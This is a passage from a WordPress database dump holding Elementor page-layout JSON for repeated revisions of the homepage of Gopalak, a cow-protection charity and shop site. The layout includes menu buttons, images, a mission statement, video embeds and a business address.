here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10033,1679,'_elementor_page_assets','a:0:{}'),(10036,1680,'_elementor_edit_mode','builder'),(10037,1680,'_elementor_template_type','wp-page'),(10038,1680,'_elementor_version','3.7.8'),(10039,1680,'_wp_page_template','elementor_canvas'),(10040,1680,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_gallery_thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10041,1680,'_elementor_page_assets','a:0:{}'),(10043,1681,'_elementor_edit_mode','builder'),(10044,1681,'_elementor_template_type','wp-page'),(10045,1681,'_elementor_version','3.7.8'),(10046,1681,'_wp_page_template','elementor_canvas'),(10047,1681,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_gallery_thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\